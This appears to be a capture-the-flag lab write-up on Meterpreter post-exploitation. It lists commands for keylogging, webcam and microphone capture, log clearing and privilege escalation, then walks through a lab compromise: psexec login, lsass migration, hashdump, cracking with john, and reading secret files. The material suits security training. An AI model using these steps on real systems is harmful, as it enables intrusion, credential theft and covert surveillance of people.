Take a deep dive into Meterpreter, and see how in-memory payloads can be used for post-exploitation.
Core commands:
background
: Backgrounds the current sessionexit
: Terminate the Meterpreter sessionguid
: Get the session GUID (Globally Unique Identifier)help
: Displays the help menuinfo
: Displays information about a Post moduleirb
: Opens an interactive Ruby shell on the current sessionload
: Loads one or more Meterpreter extensionsmigrate
: Allows you to migrate Meterpreter to another processrun
: Executes a Meterpreter script or Post modulesessions
: Quickly switch to another session
File system commands:
cd
: Will change directoryls
: Will list files in the current directory (dir will also work)pwd
: Prints the current working directoryedit
: will allow you to edit a filecat
: Will show the contents of a file to the screenrm
: Will delete the specified filesearch
: Will search for filesupload
: Will upload a file or directorydownload
: Will download a file or directory
Networking commands:
arp
: Displays the host ARP (Address Resolution Protocol) cacheifconfig
: Displays network interfaces available on the target systemnetstat
: Displays the network connectionsportfwd
: Forwards a local port to a remote serviceroute
: Allows you to view and modify the routing table
System commands:
clearev
: Clears the event logsexecute
: Executes a commandgetpid
: Shows the current process identifiergetuid
: Shows the user that Meterpreter is running askill
: Terminates a processpkill
: Terminates processes by nameps
: Lists running processesreboot
: Reboots the remote computershell
: Drops into a system command shellshutdown
: Shuts down the remote computersysinfo
: Gets information about the remote system, such as OS
Others Commands (these will be listed under different menu categories in the help menu):
idletime
: Returns the number of seconds the remote user has been idlekeyscan_dump
: Dumps the keystroke bufferkeyscan_start
: Starts capturing keystrokeskeyscan_stop
: Stops capturing keystrokesscreenshare
: Allows you to watch the remote user's desktop in real timescreenshot
: Grabs a screenshot of the interactive desktoprecord_mic
: Records audio from the default microphone for X secondswebcam_chat
: Starts a video chatwebcam_list
: Lists webcamswebcam_snap
: Takes a snapshot from the specified webcamwebcam_stream
: Plays a video stream from the specified webcamgetsystem
: Attempts to elevate your privilege to that of local systemhashdump
: Dumps the contents of the SAM database
Title | IP Address |
---|---|
Win4Meterpreter | 1*.**.***.*** |
LHOST using msfconsole
:
db_nmap -A -vv -T4 -oN initial 1*.**.***.***
user exploit/windows/smb/psexec
hosts -R
set lhost 1*.*.**.**
set smbuser ballen
set smbpass Password1
run
RHOST using meterpreter
:
sysinfo
Computer : A***-T***
Domain : F****
background
LHOST using msfconsole
:
use post/windows/gather/enum_shares
set session 1
run
[*] Name: s********
sessions 1
RHOST using meterpreter
:
ps
756 632 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
migrate 756
hashdump
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:6*******************************:::
- Copy
background
LHOST using msfconsole
:
cat > hash
- Paste
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
T******* (?)
sessions 1
RHOST using meterpreter
:
search -f secrets.txt
C:\P****** F**** (***)\W****** M********* P*******\secrets.txt (35 bytes)
cat "C:\P****** F**** (***)\W****** M********* P*******\secrets.txt"
My Twitter password is KDS********!
search -f realsecret.txt
C:\*******\*******\realsecret.txt (34 bytes)
cat "C:\*******\*******\realsecret.txt"
T** F**** i* t** f****** m** a****